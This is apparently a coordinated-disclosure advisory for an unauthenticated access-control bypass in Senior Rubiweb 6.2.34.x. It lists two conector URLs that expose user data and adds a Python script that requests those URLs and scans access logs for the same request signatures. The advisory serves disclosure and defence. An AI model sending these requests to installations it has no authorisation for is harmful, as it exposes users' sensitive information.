A remote authentication bypass in Senior Rubiweb 6.2.34.28 and 6.2.34.37 gives an unauthenticated attacker administrative access to sensitive information about the users of an affected installation. The attacker only needs to request the correct URL; no credentials, session or special tooling are required.
- Announcement (to Vendor): 2019-12-02
- Public disclosure date: 2020-01-30
Vulnerability type: Incorrect Access Control
Vendor: Senior
Affected versions:
- Rubiweb - 6.2.34.37
- Rubiweb - 6.2.34.28
- Other versions, especially others in the same 6.2.34.x release family, may also be affected (not tested)
Product: Rubiweb
Attack vector: Remote
True
Sensitive information is reachable by anyone who can reach the portal; the only requirement is knowing the correct URI. No credentials, session cookie or prior authentication are needed.
True
- Connect to the authenticated portal to confirm the presence and version of the affected product:
- hXXp://subdomain.customer.tld:8080/rubiweb/
- Request either of the vulnerable pages directly (administrative functions served without authentication):
- hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=EXESENHA&SIS=FP&LOGINKIND=1
- hXXp://subdomain.customer.tld:8080/rubiweb/conector?ACAO=ENTRANCEREL&SIS=FP&NOME=FPIN103.ANU
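The reproduction steps above can be turned into a small check that asset owners and responders can run: build the two unauthenticated conector URLs for a host, request them with no session, and classify the answer; and, on the detection side, flag the same two request signatures in web server access logs. This is an added example and not code from the advisory or from Senior; the host name, port and path follow the advisory, the hXXp:// defanging is dropped so the URLs are requestable, the classification rule (a 200 on the conector URL means exposed, a redirect to the portal or a 401/403 means protected) is an assumption rather than vendor-documented behaviour, and the access-log lines are constructed. On a vulnerable system the probe itself retrieves sensitive data, so run it only against installations you are authorised to test.

```python
import re
import sys
import urllib.error
import urllib.parse
import urllib.request

# Query parameters of the two endpoints listed in the advisory (exact values).
PROBES = {
    "EXESENHA": {"ACAO": "EXESENHA", "SIS": "FP", "LOGINKIND": "1"},
    "ENTRANCEREL": {"ACAO": "ENTRANCEREL", "SIS": "FP", "NOME": "FPIN103.ANU"},
}


def build_probe_urls(host, port=8080, scheme="http", base_path="/rubiweb/"):
    """Return {name: url} for the advisory's two unauthenticated endpoints.
    Defaults mirror the advisory's example host (port 8080, /rubiweb/)."""
    base = f"{scheme}://{host}:{port}{base_path}conector"
    return {name: f"{base}?{urllib.parse.urlencode(params)}"
            for name, params in PROBES.items()}


def classify(status, final_url):
    """Classify one probe (assumption, not from the advisory): a vulnerable
    install answers 200 on the conector URL itself; a protected one redirects
    away from it (so the final URL no longer carries ACAO=) or returns 401/403."""
    if status == 200 and "ACAO=" in final_url:
        return "exposed"
    if status in (401, 403) or "ACAO=" not in final_url:
        return "protected"
    return "unknown"


def probe(url, timeout=10):
    """Fetch url with no cookies or session; redirects are followed so the
    final URL shows whether the app bounced us to its login page."""
    req = urllib.request.Request(url, headers={"User-Agent": "rubiweb-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.geturl()
    except urllib.error.HTTPError as err:   # 4xx/5xx still carry a status
        return err.code, err.geturl()


# Detection side: combined log format ("METHOD path HTTP/x.y" status ...).
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
SIGNATURES = ("ACAO=EXESENHA", "ACAO=ENTRANCEREL")


def find_exploit_attempts(log_lines):
    """Return [(path, status)] for requests hitting either advisory endpoint.
    The query string is percent-decoded first so encoded variants still match.
    Combined-format logs carry no cookie, so a 200 here means the request was
    served, not necessarily that it was unauthenticated; treat hits as leads."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        path = urllib.parse.unquote(m.group("path"))
        if "/rubiweb/conector" in path and any(sig in path for sig in SIGNATURES):
            hits.append((path, int(m.group("status"))))
    return hits


# Constructed sample log (not real traffic): two hits and two benign requests.
SAMPLE_LOG = [
    '203.0.113.7 - - [30/Jan/2020:10:01:02 -0300] "GET /rubiweb/ HTTP/1.1" 200 1532',
    '203.0.113.7 - - [30/Jan/2020:10:01:05 -0300] "GET /rubiweb/conector?ACAO=EXESENHA&SIS=FP&LOGINKIND=1 HTTP/1.1" 200 8841',
    '203.0.113.7 - - [30/Jan/2020:10:01:09 -0300] "GET /rubiweb/conector?ACAO%3DENTRANCEREL&SIS=FP&NOME=FPIN103.ANU HTTP/1.1" 200 20312',
    '198.51.100.2 - - [30/Jan/2020:10:02:00 -0300] "GET /rubiweb/images/logo.png HTTP/1.1" 200 4410',
]


if __name__ == "__main__":
    host = sys.argv[1] if len(sys.argv) > 1 else "subdomain.customer.tld"
    for name, url in build_probe_urls(host).items():
        try:
            status, final_url = probe(url)
            print(f"{name}: HTTP {status} -> {classify(status, final_url)}")
        except urllib.error.URLError as err:
            print(f"{name}: unreachable ({err.reason})")
    for path, status in find_exploit_attempts(SAMPLE_LOG):
        print(f"log hit: {status} {path}")
```

Usage: `python3 rubiweb_check.py subdomain.customer.tld` probes both endpoints; the log scan can be pointed at a real access log by replacing `SAMPLE_LOG` with the file's lines. An "unknown" result (for example a 500) means the rule could not decide and the response should be looked at by hand.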
Credits: Mauricio Santos (R&D UnderProtection) and Hesron Hori (R&D UnderProtection)
Thanks: Senior's Information Security Team, who collaborated in the coordinated disclosure